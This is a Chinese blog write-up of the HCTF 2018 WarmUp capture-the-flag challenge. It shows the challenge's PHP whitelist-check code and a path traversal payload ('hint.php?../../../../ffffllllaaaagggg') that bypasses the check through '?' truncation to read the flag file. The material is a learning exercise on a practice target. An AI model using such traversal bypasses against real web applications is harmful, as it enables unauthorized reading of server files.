[HCTF 2018]WarmUp

[HCTF 2018]WarmUp

学习记录 这个属于文件跳转

f12 编辑
可以看到代码

 class emmm
    {
        public static function checkFile(&$page)
        {
            //先看一下对函数里输入了什么
			$a=&$page;
			echo $a."<br>";
 
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
 
            if (in_array($page, $whitelist)) {
                return true;
            }
 
            echo mb_strpos($page . '?', '?')."<br>";//没匹配到所以返回字符串长度
 
            $_page = mb_substr($page,0, mb_strpos($page . '?', '?'));
 
			echo "2".$_page."<br>";//经过一次后返回值
            if (in_array($_page, $whitelist)) {
                return true;
            }
 
            $_page = urldecode($page);
 
			echo "3".$_page."<br>";//二次编码后的返回值
 
			echo mb_strpos($page . '?', '?')."<br>";//注意输出时与第一次的区别
 
            $_page = mb_substr($page,0, mb_strpos($_page . '?', '?'));
 
			echo "4".$_page."<br>";//再次看经过截取后的输出
 
            if (in_array($_page, $whitelist)) {
				echo "sdf you can't see it";//证明进入该函数
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

我们看到 hint.php 文件

        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

这里可以知道flag应该在叫ffffllllaaaagggg的文件中

重点是我们不知道具体在那个文件中,所以用…/来返回上层目录一个一个的刷新试
$page=hint.php?/…/ffffllllaaaagggg
$page=hint.php?/…/…/ffffllllaaaagggg

hint.php?../../../../ffffllllaaaagggg
posted @   xiaojiu99  阅读(9)  评论(0编辑  收藏  举报  
相关博文:
·  [ACTF2020 新生赛]Include1
·  [极客大挑战 2019]Havefun 1
·  [HCTF 2018]WarmUp
·  [HCTF 2018]WarmUp
·  [HCTF 2018]warmup
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
点击右上角即可分享
微信分享提示
AI IDE Trae